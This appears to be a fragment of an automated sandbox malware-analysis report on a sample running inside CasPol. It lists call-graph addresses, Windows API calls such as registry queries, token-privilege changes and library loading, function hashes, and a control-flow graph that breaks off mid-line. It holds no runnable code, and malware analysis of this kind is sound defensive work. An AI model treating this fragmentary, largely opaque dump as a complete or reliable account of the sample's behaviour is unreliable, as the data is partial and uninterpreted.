41553->42071 41555 1f822ecb 41554->41555 42078 cd882f 41554->42078 42086 cd88ee 41554->42086 42090 cd8aa2 41554->42090 41556 1f822f16 41555->41556 41575 cd882f 11 API calls 41555->41575 41576 cd88ee 11 API calls 41555->41576 41577 cd8aa2 11 API calls 41555->41577 41557 1f82305d 41556->41557 42094 cda991 41556->42094 42098 cda9f0 41556->42098 41558 1f8230b1 41557->41558 42102 cdaf00 41557->42102 42110 cdac61 41557->42110 41559 1f823105 41558->41559 42117 cdb558 41558->42117 41559->41522 41569->41554 41570->41554 41575->41556 41576->41556 41577->41556 41579 1f822f51 41578->41579 41580 1f82305d 41579->41580 41583 cda991 4 API calls 41579->41583 41584 cda9f0 4 API calls 41579->41584 41581 1f8230b1 41580->41581 41585 cdac61 4 API calls 41580->41585 41586 cdaf00 4 API calls 41580->41586 41582 1f823105 41581->41582 41587 cdb558 LdrInitializeThunk 41581->41587 41582->41522 41583->41580 41584->41580 41585->41581 41586->41581 41587->41582 41589 1f822d4d 41588->41589 41590 1f822e3e 41589->41590 41611 cd774f 12 API calls 41589->41611 41612 cd79e0 12 API calls 41589->41612 41591 1f822e80 41590->41591 41597 cd774f 12 API calls 41590->41597 41598 cd79e0 12 API calls 41590->41598 41599 cd7c30 12 API calls 41590->41599 41592 1f822ecb 41591->41592 41600 cd882f 12 API calls 41591->41600 41601 cd88ee 12 API calls 41591->41601 41602 cd8aa2 12 API calls 41591->41602 41593 1f822f16 41592->41593 41603 cd882f 12 API calls 41592->41603 41604 cd88ee 12 API calls 41592->41604 41605 cd8aa2 12 API calls 41592->41605 41594 1f82305d 41593->41594 41606 cda991 4 API calls 41593->41606 41607 cda9f0 4 API calls 41593->41607 41595 1f8230b1 41594->41595 41608 cdac61 4 API calls 41594->41608 41609 cdaf00 4 API calls 41594->41609 41596 1f823105 41595->41596 41610 cdb558 LdrInitializeThunk 41595->41610 41596->41522 41597->41591 41598->41591 41599->41591 41600->41592 41601->41592 41602->41592 41603->41593 41604->41593 41605->41593 41606->41594 41607->41594 41608->41595 41609->41595 41610->41596 41611->41590 41612->41590 41614 1f823044 41613->41614 41615 1f82305d 41614->41615 41618 cda991 4 API calls 41614->41618 41619 cda9f0 4 API calls 41614->41619 41616 1f8230b1 41615->41616 41620 cdac61 4 API calls 41615->41620 41621 cdaf00 4 API calls 41615->41621 41617 1f823105 41616->41617 41622 cdb558 LdrInitializeThunk 41616->41622 41617->41522 41618->41615 41619->41615 41620->41616 41621->41616 41622->41617 41624 1f822abc 41623->41624 41635 1f827682 11 API calls 41624->41635 41636 1f8276e0 11 API calls 41624->41636 41625 1f822bc8 KiUserExceptionDispatcher 41627 1f822c28 41625->41627 41628 1f822e3e 41627->41628 41637 cd774f 11 API calls 41627->41637 41638 cd79e0 11 API calls 41627->41638 41629 1f822e80 41628->41629 41639 cd774f 11 API calls 41628->41639 41640 cd79e0 11 API calls 41628->41640 41641 cd7c30 11 API calls 41628->41641 41630 1f822ecb 41629->41630 41642 cd882f 11 API calls 41629->41642 41643 cd88ee 11 API calls 41629->41643 41644 cd8aa2 11 API calls 41629->41644 41631 1f822f16 41630->41631 41645 cd882f 11 API calls 41630->41645 41646 cd88ee 11 API calls 41630->41646 41647 cd8aa2 11 API calls 41630->41647 41632 1f82305d 41631->41632 41648 cda991 4 API calls 41631->41648 41649 cda9f0 4 API calls 41631->41649 41633 1f8230b1 41632->41633 41650 cdac61 4 API calls 41632->41650 41651 cdaf00 4 API calls 41632->41651 41634 1f823105 41633->41634 41652 cdb558 LdrInitializeThunk 41633->41652 41634->41522 41635->41625 41636->41625 41637->41628 41638->41628 41639->41629 41640->41629 41641->41629 41642->41630 41643->41630 41644->41630 41645->41631 41646->41631 41647->41631 41648->41632 41649->41632 41650->41633 41651->41633 41652->41634 41654 1f822a2d 41653->41654 41676 1f827682 11 API calls 41654->41676 41677 1f8276e0 11 API calls 41654->41677 41655 1f822bc8 KiUserExceptionDispatcher 41657 1f822c28 41655->41657 41658 1f822e3e 41657->41658 41678 cd774f 11 API calls 41657->41678 41679 cd79e0 11 API calls 41657->41679 41659 1f822e80 41658->41659 41680 cd774f 11 API calls 41658->41680 41681 cd79e0 11 API calls 41658->41681 41682 cd7c30 11 API calls 41658->41682 41660 1f822ecb 41659->41660 41665 cd882f 11 API calls 41659->41665 41666 cd88ee 11 API calls 41659->41666 41667 cd8aa2 11 API calls 41659->41667 41661 1f822f16 41660->41661 41668 cd882f 11 API calls 41660->41668 41669 cd88ee 11 API calls 41660->41669 41670 cd8aa2 11 API calls 41660->41670 41662 1f82305d 41661->41662 41671 cda991 4 API calls 41661->41671 41672 cda9f0 4 API calls 41661->41672 41663 1f8230b1 41662->41663 41673 cdac61 4 API calls 41662->41673 41674 cdaf00 4 API calls 41662->41674 41664 1f823105 41663->41664 41675 cdb558 LdrInitializeThunk 41663->41675 41664->41522 41665->41660 41666->41660 41667->41660 41668->41661 41669->41661 41670->41661 41671->41662 41672->41662 41673->41663 41674->41663 41675->41664 41676->41655 41677->41655 41678->41658 41679->41658 41680->41659 41681->41659 41682->41659 41684 1f822cb7 41683->41684 41685 1f822e3e 41684->41685 41692 cd774f 12 API calls 41684->41692 41693 cd79e0 12 API calls 41684->41693 41686 1f822e80 41685->41686 41694 cd774f 12 API calls 41685->41694 41695 cd79e0 12 API calls 41685->41695 41696 cd7c30 12 API calls 41685->41696 41687 1f822ecb 41686->41687 41697 cd882f 12 API calls 41686->41697 41698 cd88ee 12 API calls 41686->41698 41699 cd8aa2 12 API calls 41686->41699 41688 1f822f16 41687->41688 41700 cd882f 12 API calls 41687->41700 41701 cd88ee 12 API calls 41687->41701 41702 cd8aa2 12 API calls 41687->41702 41689 1f82305d 41688->41689 41703 cda991 4 API calls 41688->41703 41704 cda9f0 4 API calls 41688->41704 41690 1f8230b1 41689->41690 41705 cdac61 4 API calls 41689->41705 41706 cdaf00 4 API calls 41689->41706 41691 1f823105 41690->41691 41707 cdb558 LdrInitializeThunk 41690->41707 41691->41522 41692->41685 41693->41685 41694->41686 41695->41686 41696->41686 41697->41687 41698->41687 41699->41687 41700->41688 41701->41688 41702->41688 41703->41689 41704->41689 41705->41690 41706->41690 41707->41691 41709 1f822eb2 41708->41709 41710 1f822ecb 41709->41710 41720 cd882f 12 API calls 41709->41720 41721 cd88ee 12 API calls 41709->41721 41722 cd8aa2 12 API calls 41709->41722 41711 1f822f16 41710->41711 41723 cd882f 12 API calls 41710->41723 41724 cd88ee 12 API calls 41710->41724 41725 cd8aa2 12 API calls 41710->41725 41712 1f82305d 41711->41712 41715 cda991 4 API calls 41711->41715 41716 cda9f0 4 API calls 41711->41716 41713 1f8230b1 41712->41713 41717 cdac61 4 API calls 41712->41717 41718 cdaf00 4 API calls 41712->41718 41714 1f823105 41713->41714 41719 cdb558 LdrInitializeThunk 41713->41719 41714->41522 41715->41712 41716->41712 41717->41713 41718->41713 41719->41714 41720->41710 41721->41710 41722->41710 41723->41711 41724->41711 41725->41711 41727 1f822baf 41726->41727 41754 1f827682 11 API calls 41727->41754 41755 1f8276e0 11 API calls 41727->41755 41728 1f822bc8 KiUserExceptionDispatcher 41730 1f822c28 41728->41730 41731 1f822e3e 41730->41731 41743 cd774f 11 API calls 41730->41743 41744 cd79e0 11 API calls 41730->41744 41732 1f822e80 41731->41732 41745 cd774f 11 API calls 41731->41745 41746 cd79e0 11 API calls 41731->41746 41747 cd7c30 11 API calls 41731->41747 41733 1f822ecb 41732->41733 41748 cd882f 11 API calls 41732->41748 41749 cd88ee 11 API calls 41732->41749 41750 cd8aa2 11 API calls 41732->41750 41734 1f822f16 41733->41734 41751 cd882f 11 API calls 41733->41751 41752 cd88ee 11 API calls 41733->41752 41753 cd8aa2 11 API calls 41733->41753 41735 1f82305d 41734->41735 41738 cda991 4 API calls 41734->41738 41739 cda9f0 4 API calls 41734->41739 41736 1f8230b1 41735->41736 41740 cdac61 4 API calls 41735->41740 41741 cdaf00 4 API calls 41735->41741 41737 1f823105 41736->41737 41742 cdb558 LdrInitializeThunk 41736->41742 41737->41522 41738->41735 41739->41735 41740->41736 41741->41736 41742->41737 41743->41731 41744->41731 41745->41732 41746->41732 41747->41732 41748->41733 41749->41733 41750->41733 41751->41734 41752->41734 41753->41734 41754->41728 41755->41728 41757 1f822fa5 41756->41757 41758 1f82305d 41757->41758 41761 cda991 4 API calls 41757->41761 41762 cda9f0 4 API calls 41757->41762 41759 1f8230b1 41758->41759 41763 cdac61 4 API calls 41758->41763 41764 cdaf00 4 API calls 41758->41764 41760 1f823105 41759->41760 41765 cdb558 LdrInitializeThunk 41759->41765 41760->41522 41761->41758 41762->41758 41763->41759 41764->41759 41765->41760 41767 1f822e25 41766->41767 41768 1f822e3e 41767->41768 41780 cd774f 12 API calls 41767->41780 41781 cd79e0 12 API calls 41767->41781 41769 1f822e80 41768->41769 41782 cd774f 12 API calls 41768->41782 41783 cd79e0 12 API calls 41768->41783 41784 cd7c30 12 API calls 41768->41784 41770 1f822ecb 41769->41770 41785 cd882f 12 API calls 41769->41785 41786 cd88ee 12 API calls 41769->41786 41787 cd8aa2 12 API calls 41769->41787 41771 1f822f16 41770->41771 41788 cd882f 12 API calls 41770->41788 41789 cd88ee 12 API calls 41770->41789 41790 cd8aa2 12 API calls 41770->41790 41772 1f82305d 41771->41772 41775 cda991 4 API calls 41771->41775 41776 cda9f0 4 API calls 41771->41776 41773 1f8230b1 41772->41773 41777 cdac61 4 API calls 41772->41777 41778 cdaf00 4 API calls 41772->41778 41774 1f823105 41773->41774 41779 cdb558 LdrInitializeThunk 41773->41779 41774->41522 41775->41772 41776->41772 41777->41773 41778->41773 41779->41774 41780->41768 41781->41768 41782->41769 41783->41769 41784->41769 41785->41770 41786->41770 41787->41770 41788->41771 41789->41771 41790->41771 41792 1f821dba 41791->41792 41794 1f82296c 41792->41794 42150 1f824b91 41792->42150 41793 1f8229e3 41794->41793 41795 1f824b91 12 API calls 41794->41795 42154 1f824e88 41794->42154 41795->41794 41799 1f823098 41798->41799 41800 1f8230b1 41799->41800 41801 cdac61 4 API calls 41799->41801 41802 cdaf00 4 API calls 41799->41802 41803 cdb558 LdrInitializeThunk 41800->41803 41804 1f823105 41800->41804 41801->41800 41802->41800 41803->41804 41804->41522 41806 1f821d8b 41805->41806 41808 1f82296c 41806->41808 41811 1f824b91 12 API calls 41806->41811 41807 1f8229e3 41808->41807 41809 1f824b91 12 API calls 41808->41809 41810 1f824e88 12 API calls 41808->41810 41809->41808 41810->41808 41811->41808 41813 1f822b10 41812->41813 41838 1f827682 11 API calls 41813->41838 41839 1f8276e0 11 API calls 41813->41839 41814 1f822bc8 KiUserExceptionDispatcher 41816 1f822c28 41814->41816 41817 1f822e3e 41816->41817 41827 cd774f 11 API calls 41816->41827 41828 cd79e0 11 API calls 41816->41828 41818 1f822e80 41817->41818 41829 cd774f 11 API calls 41817->41829 41830 cd79e0 11 API calls 41817->41830 41831 cd7c30 11 API calls 41817->41831 41819 1f822ecb 41818->41819 41832 cd882f 11 API calls 41818->41832 41833 cd88ee 11 API calls 41818->41833 41834 cd8aa2 11 API calls 41818->41834 41820 1f822f16 41819->41820 41835 cd882f 11 API calls 41819->41835 41836 cd88ee 11 API calls 41819->41836 41837 cd8aa2 11 API calls 41819->41837 41821 1f82305d 41820->41821 41840 cda991 4 API calls 41820->41840 41841 cda9f0 4 API calls 41820->41841 41822 1f8230b1 41821->41822 41824 cdac61 4 API calls 41821->41824 41825 cdaf00 4 API calls 41821->41825 41823 1f823105 41822->41823 41826 cdb558 LdrInitializeThunk 41822->41826 41823->41522 41824->41822 41825->41822 41826->41823 41827->41817 41828->41817 41829->41818 41830->41818 41831->41818 41832->41819 41833->41819 41834->41819 41835->41820 41836->41820 41837->41820 41838->41814 41839->41814 41840->41821 41841->41821 41843 1f822d8f 41842->41843 41844 1f822e3e 41843->41844 41859 cd774f 12 API calls 41843->41859 41860 cd79e0 12 API calls 41843->41860 41845 1f822e80 41844->41845 41861 cd774f 12 API calls 41844->41861 41862 cd79e0 12 API calls 41844->41862 41863 cd7c30 12 API calls 41844->41863 41846 1f822ecb 41845->41846 41864 cd882f 12 API calls 41845->41864 41865 cd88ee 12 API calls 41845->41865 41866 cd8aa2 12 API calls 41845->41866 41847 1f822f16 41846->41847 41851 cd882f 12 API calls 41846->41851 41852 cd88ee 12 API calls 41846->41852 41853 cd8aa2 12 API calls 41846->41853 41848 1f82305d 41847->41848 41854 cda991 4 API calls 41847->41854 41855 cda9f0 4 API calls 41847->41855 41849 1f8230b1 41848->41849 41856 cdac61 4 API calls 41848->41856 41857 cdaf00 4 API calls 41848->41857 41850 1f823105 41849->41850 41858 cdb558 LdrInitializeThunk 41849->41858 41850->41522 41851->41847 41852->41847 41853->41847 41854->41848 41855->41848 41856->41849 41857->41849 41858->41850 41859->41844 41860->41844 41861->41845 41862->41845 41863->41845 41864->41846 41865->41846 41866->41846 41868 1f822d02 41867->41868 41869 1f822e3e 41868->41869 41881 cd774f 12 API calls 41868->41881 41882 cd79e0 12 API calls 41868->41882 41870 1f822e80 41869->41870 41883 cd774f 12 API calls 41869->41883 41884 cd79e0 12 API calls 41869->41884 41885 cd7c30 12 API calls 41869->41885 41871 1f822ecb 41870->41871 41886 cd882f 12 API calls 41870->41886 41887 cd88ee 12 API calls 41870->41887 41888 cd8aa2 12 API calls 41870->41888 41872 1f822f16 41871->41872 41889 cd882f 12 API calls 41871->41889 41890 cd88ee 12 API calls 41871->41890 41891 cd8aa2 12 API calls 41871->41891 41873 1f82305d 41872->41873 41876 cda991 4 API calls 41872->41876 41877 cda9f0 4 API calls 41872->41877 41874 1f8230b1 41873->41874 41878 cdac61 4 API calls 41873->41878 41879 cdaf00 4 API calls 41873->41879 41875 1f823105 41874->41875 41880 cdb558 LdrInitializeThunk 41874->41880 41875->41522 41876->41873 41877->41873 41878->41874 41879->41874 41880->41875 41881->41869 41882->41869 41883->41870 41884->41870 41885->41870 41886->41871 41887->41871 41888->41871 41889->41872 41890->41872 41891->41872 41893 1f822c03 KiUserExceptionDispatcher 41892->41893 41895 1f822c28 41893->41895 41896 1f822e3e 41895->41896 41908 cd774f 11 API calls 41895->41908 41909 cd79e0 11 API calls 41895->41909 41897 1f822e80 41896->41897 41910 cd774f 11 API calls 41896->41910 41911 cd79e0 11 API calls 41896->41911 41912 cd7c30 11 API calls 41896->41912 41898 1f822ecb 41897->41898 41913 cd882f 11 API calls 41897->41913 41914 cd88ee 11 API calls 41897->41914 41915 cd8aa2 11 API calls 41897->41915 41899 1f822f16 41898->41899 41916 cd882f 11 API calls 41898->41916 41917 cd88ee 11 API calls 41898->41917 41918 cd8aa2 11 API calls 41898->41918 41900 1f82305d 41899->41900 41903 cda991 4 API calls 41899->41903 41904 cda9f0 4 API calls 41899->41904 41901 1f8230b1 41900->41901 41905 cdac61 4 API calls 41900->41905 41906 cdaf00 4 API calls 41900->41906 41902 1f823105 41901->41902 41907 cdb558 LdrInitializeThunk 41901->41907 41902->41522 41903->41900 41904->41900 41905->41901 41906->41901 41907->41902 41908->41896 41909->41896 41910->41897 41911->41897 41912->41897 41913->41898 41914->41898 41915->41898 41916->41899 41917->41899 41918->41899 41920 1f822efd 41919->41920 41921 1f822f16 41920->41921 41925 cd882f 12 API calls 41920->41925 41926 cd88ee 12 API calls 41920->41926 41927 cd8aa2 12 API calls 41920->41927 41922 1f82305d 41921->41922 41928 cda991 4 API calls 41921->41928 41929 cda9f0 4 API calls 41921->41929 41923 1f8230b1 41922->41923 41930 cdac61 4 API calls 41922->41930 41931 cdaf00 4 API calls 41922->41931 41924 1f823105 41923->41924 41932 cdb558 LdrInitializeThunk 41923->41932 41924->41522 41925->41921 41926->41921 41927->41921 41928->41922 41929->41922 41930->41923 41931->41923 41932->41924 41934 1f822ff0 41933->41934 41935 1f82305d 41934->41935 41938 cda991 4 API calls 41934->41938 41939 cda9f0 4 API calls 41934->41939 41936 1f8230b1 41935->41936 41940 cdac61 4 API calls 41935->41940 41941 cdaf00 4 API calls 41935->41941 41937 1f823105 41936->41937 41942 cdb558 LdrInitializeThunk 41936->41942 41937->41522 41938->41935 41939->41935 41940->41936 41941->41936 41942->41937 41944 1f822e70 41943->41944 41945 1f822e80 41944->41945 41959 cd774f 12 API calls 41944->41959 41960 cd79e0 12 API calls 41944->41960 41961 cd7c30 12 API calls 41944->41961 41946 1f822ecb 41945->41946 41962 cd882f 12 API calls 41945->41962 41963 cd88ee 12 API calls 41945->41963 41964 cd8aa2 12 API calls 41945->41964 41947 1f822f16 41946->41947 41951 cd882f 12 API calls 41946->41951 41952 cd88ee 12 API calls 41946->41952 41953 cd8aa2 12 API calls 41946->41953 41948 1f82305d 41947->41948 41954 cda991 4 API calls 41947->41954 41955 cda9f0 4 API calls 41947->41955 41949 1f8230b1 41948->41949 41956 cdac61 4 API calls 41948->41956 41957 cdaf00 4 API calls 41948->41957 41950 1f823105 41949->41950 41958 cdb558 LdrInitializeThunk 41949->41958 41950->41522 41951->41947 41952->41947 41953->41947 41954->41948 41955->41948 41956->41949 41957->41949 41958->41950 41959->41945 41960->41945 41961->41945 41962->41946 41963->41946 41964->41946 41966 1f8230ec 41965->41966 41967 1f823105 41966->41967 41968 cdb558 LdrInitializeThunk 41966->41968 41967->41522 41968->41967 41970 1f822a68 41969->41970 41986 1f827682 11 API calls 41970->41986 41987 1f8276e0 11 API calls 41970->41987 41971 1f822bc8 KiUserExceptionDispatcher 41973 1f822c28 41971->41973 41974 1f822e3e 41973->41974 41988 cd774f 11 API calls 41973->41988 41989 cd79e0 11 API calls 41973->41989 41975 1f822e80 41974->41975 41990 cd774f 11 API calls 41974->41990 41991 cd79e0 11 API calls 41974->41991 41992 cd7c30 11 API calls 41974->41992 41976 1f822ecb 41975->41976 41993 cd882f 11 API calls 41975->41993 41994 cd88ee 11 API calls 41975->41994 41995 cd8aa2 11 API calls 41975->41995 41977 1f822f16 41976->41977 41996 cd882f 11 API calls 41976->41996 41997 cd88ee 11 API calls 41976->41997 41998 cd8aa2 11 API calls 41976->41998 41978 1f82305d 41977->41978 41981 cda991 4 API calls 41977->41981 41982 cda9f0 4 API calls 41977->41982 41979 1f8230b1 41978->41979 41983 cdac61 4 API calls 41978->41983 41984 cdaf00 4 API calls 41978->41984 41980 1f823105 41979->41980 41985 cdb558 LdrInitializeThunk 41979->41985 41980->41522 41981->41978 41982->41978 41983->41979 41984->41979 41985->41980 41986->41971 41987->41971 41988->41974 41989->41974 41990->41975 41991->41975 41992->41975 41993->41976 41994->41976 41995->41976 41996->41977 41997->41977 41998->41977 42000 1f822c63 41999->42000 42001 1f822e3e 42000->42001 42013 cd774f 12 API calls 42000->42013 42014 cd79e0 12 API calls 42000->42014 42002 1f822e80 42001->42002 42015 cd774f 12 API calls 42001->42015 42016 cd79e0 12 API calls 42001->42016 42017 cd7c30 12 API calls 42001->42017 42003 1f822ecb 42002->42003 42018 cd882f 12 API calls 42002->42018 42019 cd88ee 12 API calls 42002->42019 42020 cd8aa2 12 API calls 42002->42020 42004 1f822f16 42003->42004 42021 cd882f 12 API calls 42003->42021 42022 cd88ee 12 API calls 42003->42022 42023 cd8aa2 12 API calls 42003->42023 42005 1f82305d 42004->42005 42008 cda991 4 API calls 42004->42008 42009 cda9f0 4 API calls 42004->42009 42006 1f8230b1 42005->42006 42010 cdac61 4 API calls 42005->42010 42011 cdaf00 4 API calls 42005->42011 42007 1f823105 42006->42007 42012 cdb558 LdrInitializeThunk 42006->42012 42007->41522 42008->42005 42009->42005 42010->42006 42011->42006 42012->42007 42013->42001 42014->42001 42015->42002 42016->42002 42017->42002 42018->42003 42019->42003 42020->42003 42021->42004 42022->42004 42023->42004 42025 1f822dda 42024->42025 42026 1f822e3e 42025->42026 42038 cd774f 12 API calls 42025->42038 42039 cd79e0 12 API calls 42025->42039 42027 1f822e80 42026->42027 42040 cd774f 12 API calls 42026->42040 42041 cd79e0 12 API calls 42026->42041 42042 cd7c30 12 API calls 42026->42042 42028 1f822ecb 42027->42028 42043 cd882f 12 API calls 42027->42043 42044 cd88ee 12 API calls 42027->42044 42045 cd8aa2 12 API calls 42027->42045 42029 1f822f16 42028->42029 42046 cd882f 12 API calls 42028->42046 42047 cd88ee 12 API calls 42028->42047 42048 cd8aa2 12 API calls 42028->42048 42030 1f82305d 42029->42030 42033 cda991 4 API calls 42029->42033 42034 cda9f0 4 API calls 42029->42034 42031 1f8230b1 42030->42031 42035 cdac61 4 API calls 42030->42035 42036 cdaf00 4 API calls 42030->42036 42032 1f823105 42031->42032 42037 cdb558 LdrInitializeThunk 42031->42037 42032->41522 42033->42030 42034->42030 42035->42031 42036->42031 42037->42032 42038->42026 42039->42026 42040->42027 42041->42027 42042->42027 42043->42028 42044->42028 42045->42028 42046->42029 42047->42029 42048->42029 42050 1f8276a1 42049->42050 42051 1f8276c4 42049->42051 42050->41550 42123 1f824fa0 42051->42123 42053 1f827730 42053->41550 42055 1f827706 42054->42055 42056 1f824fa0 12 API calls 42055->42056 42057 1f827730 42056->42057 42057->41550 42059 cd7a06 42058->42059 42060 cd7c15 42059->42060 42061 cd882f 12 API calls 42059->42061 42062 cd88ee 12 API calls 42059->42062 42063 cd8aa2 12 API calls 42059->42063 42060->41553 42061->42060 42062->42060 42063->42060 42065 cd7771 42064->42065 42066 cd7794 42064->42066 42065->41553 42066->41553 42067 cd77c1 42066->42067 42068 cd882f 12 API calls 42066->42068 42069 cd88ee 12 API calls 42066->42069 42070 cd8aa2 12 API calls 42066->42070 42067->41553 42068->42067 42069->42067 42070->42067 42072 cd7c51 42071->42072 42073 cd7c74 42071->42073 42072->41554 42074 cd7cd9 42073->42074 42075 cd882f 12 API calls 42073->42075 42076 cd88ee 12 API calls 42073->42076 42077 cd8aa2 12 API calls 42073->42077 42074->41554 42075->42074 42076->42074 42077->42074 42079 cd8866 42078->42079 42083 1f824fa0 12 API calls 42079->42083 42084 1f8252aa 12 API calls 42079->42084 42085 1f825038 12 API calls 42079->42085 42080 cd8ada 42080->41555 42081 cd887e 42081->42080 42082 1f82d720 12 API calls 42081->42082 42082->42081 42083->42081 42084->42081 42085->42081 42087 cd88b1 42086->42087 42088 cd8ada 42087->42088 42089 1f82d720 12 API calls 42087->42089 42088->41555 42089->42087 42091 cd88b1 42090->42091 42092 cd8ada 42091->42092 42093 1f82d720 12 API calls 42091->42093 42092->41555 42093->42091 42095 cda9a8 42094->42095 42096 cda9b1 42094->42096 42095->42096 42097 cdac61 4 API calls 42095->42097 42096->41557 42097->42096 42099 cdaa14 42098->42099 42100 cdaa26 42099->42100 42101 cdac61 4 API calls 42099->42101 42100->41557 42101->42100 42103 cdaf11 42102->42103 42107 cdaf34 42102->42107 42103->41558 42104 cdaf61 42104->41558 42107->41558 42107->42104 42108 1fe314cb RegQueryValueExW 42107->42108 42109 1fe3150e RegQueryValueExW 42107->42109 42142 1fe31402 42107->42142 42146 1fe313e2 42107->42146 42108->42107 42109->42107 42112 cdac8d 42110->42112 42111 cdaecf 42111->41558 42112->41558 42112->42111 42113 1fe31402 RegOpenKeyExW 42112->42113 42114 1fe313e2 RegOpenKeyExW 42112->42114 42115 1fe314cb RegQueryValueExW 42112->42115 42116 1fe3150e RegQueryValueExW 42112->42116 42113->42112 42114->42112 42115->42112 42116->42112 42119 cdb562 42117->42119 42120 cdb50b 42117->42120 42118 cdb579 42118->41559 42119->42118 42121 cdb5ee LdrInitializeThunk 42119->42121 42120->41559 42122 cdb60a 42121->42122 42127 1f824fa0 12 API calls 42123->42127 42130 1f8252aa 42123->42130 42134 1f825038 42123->42134 42124 1f824fc5 42125 1f8252e2 42124->42125 42138 1f82d720 42124->42138 42125->42053 42127->42124 42132 1f824ff8 42130->42132 42131 1f8252e2 42131->42124 42132->42131 42133 1f82d720 12 API calls 42132->42133 42133->42132 42137 1f824ff8 42134->42137 42135 1f8252e2 42135->42124 42136 1f82d720 12 API calls 42136->42137 42137->42135 42137->42136 42141 1f82d729 42138->42141 42139 1f82dac0 42139->42124 42140 1f821518 12 API calls 42140->42141 42141->42139 42141->42140 42144 1fe3143a RegOpenKeyExW 42142->42144 42145 1fe3147e 42144->42145 42145->42107 42147 1fe31402 RegOpenKeyExW 42146->42147 42149 1fe3147e 42147->42149 42149->42107 42151 1f824a80 42150->42151 42151->42150 42152 1f824e62 42151->42152 42153 1f824fa0 12 API calls 42151->42153 42152->41794 42153->42152 42155 1f824e99 42154->42155 42156 1f824ebc 42154->42156 42155->41794 42157 1f824f09 42156->42157 42158 1f824fa0 12 API calls 42156->42158 42157->41794 42158->42157 42159 1d45a4b6 42160 1d45a4e2 SetErrorMode 42159->42160 42162 1d45a50b 42159->42162 42161 1d45a4f7 42160->42161 42162->42160 42163 1d45aab6 42166 1d45aae5 AdjustTokenPrivileges 42163->42166 42165 1d45ab07 42166->42165 42167 1d45af32 42168 1d45af82 K32GetModuleBaseNameW 42167->42168 42169 1d45af8a 42168->42169 42170 1fe3071a 42171 1fe30746 FindClose 42170->42171 42172 1fe30778 42170->42172 42173 1fe3075b 42171->42173 42172->42171 42174 1d45bebe 42177 1d45bef9 LoadLibraryA 42174->42177 42176 1d45bf36 42177->42176 42178 cd4b30 42179 cd4b54 LdrInitializeThunk 42178->42179 42181 cd4ba6 42179->42181

                                          Executed Functions

                                          Function 00CD5C38 Relevance: 36.8, Strings: 28, Instructions: 1845COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-2445308728
                                          • Opcode ID: fd88fa5526de173d6dfe3514cdf67040d6e23750ea5455c5c82581f6716f574a
                                          • Instruction ID: c6f009a8ec3bdaa064f386b99c548efb8ecc730cb02b7dccd76c3a30f9901373
                                          • Opcode Fuzzy Hash: fd88fa5526de173d6dfe3514cdf67040d6e23750ea5455c5c82581f6716f574a
                                          • Instruction Fuzzy Hash: FCF27E70A012148FEB54DB79C894BAEB7F2AF84300F1581AAD61AEB391EF34DD41CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F827AE0 Relevance: 26.3, Strings: 16, Instructions: 6298COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$d$d$*r
                                          • API String ID: 0-1591864158
                                          • Opcode ID: 642e55a7924c06f674111b54181711207bf7e7c0a93eecc43f32edfa7de5fd85
                                          • Instruction ID: 3fa14484c28794bb458c46a2c72077232661905d1cb1c14faa7d63c8ff376848
                                          • Opcode Fuzzy Hash: 642e55a7924c06f674111b54181711207bf7e7c0a93eecc43f32edfa7de5fd85
                                          • Instruction Fuzzy Hash: 77D3B275D00A299FDB65CF69C844AC9BBF2BF89300F0581E5E90CAB261D771AE85CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CD79E0 Relevance: 18.5, Strings: 14, Instructions: 1036COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1343 cd79e0-cd7a38 1350 cd7a3e-cd7a64 1343->1350 1351 cd7c15-cd7c1f 1343->1351 1355 cd7a6a-cd7a8c 1350->1355 1356 cd7c25-cd7c4f 1350->1356 1355->1351 1359 cd7a92-cd7a9b 1355->1359 1360 cd7c74-cd7ccd 1356->1360 1361 cd7c51-cd7c5b 1356->1361 1359->1356 1362 cd7aa1-cd7aa9 1359->1362 1604 cd7cd3 call 1d5f05df 1360->1604 1605 cd7cd3 call cd882f 1360->1605 1606 cd7cd3 call cd88ee 1360->1606 1607 cd7cd3 call 1d5f0606 1360->1607 1608 cd7cd3 call cd8aa2 1360->1608 1363 cd7c5d-cd7c6e 1361->1363 1364 cd7c70-cd7c73 1361->1364 1365 cd7aaf-cd7ac2 1362->1365 1366 cd7c00-cd7c04 1362->1366 1363->1364 1375 cd7ac8-cd7b0c 1365->1375 1376 cd7bea-cd7bfb 1365->1376 1368 cd7c06-cd7c0f 1366->1368 1369 cd7c20 1366->1369 1368->1351 1368->1359 1369->1356 1375->1376 1393 cd7b12-cd7b2c 1375->1393 1376->1366 1377 cd7cd9-cd7da4 1408 cd7dfa-cd7e04 1377->1408 1409 cd7da6-cd7de6 1377->1409 1393->1376 1396 cd7b32-cd7b48 1393->1396 1396->1376 1401 cd7b4e-cd7b67 1396->1401 1401->1376 1407 cd7b6d-cd7bb4 1401->1407 1429 cd7bc5-cd7be8 1407->1429 1430 cd7bb6-cd7bbd 1407->1430 1413 cd7e0a-cd7e25 1408->1413 1409->1408 1416 cd7de8-cd7df8 1409->1416 1609 cd7e27 call 1d5f05df 1413->1609 1610 cd7e27 call 1fe31142 1413->1610 1611 cd7e27 call 1fe31120 1413->1611 1612 cd7e27 call 1d5f0606 1413->1612 1416->1413 1420 cd7e2c-cd7e3a 1424 cd7e3c-cd882c 1420->1424 1425 cd7e4a-cd7e67 1420->1425 1613 cd7e6a call 1d5f05df 1425->1613 1614 